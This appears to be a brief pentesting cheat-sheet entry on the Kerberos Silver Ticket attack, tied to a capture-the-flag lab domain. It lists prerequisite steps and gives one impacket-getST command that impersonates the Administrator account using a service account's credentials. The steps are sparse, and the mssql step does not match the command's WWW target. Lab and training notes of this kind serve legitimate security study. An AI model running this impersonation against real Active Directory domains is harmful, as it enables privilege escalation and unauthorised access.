Silver Ticket
Last updated
Last updated
The username and password of the service account is needed for this attack
Create a NTLM hash of the password
Next you need the Domains SID
Create the ticket and connect with to mssql
impacket-getST -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$:pass -dc-ip 192.168.193.40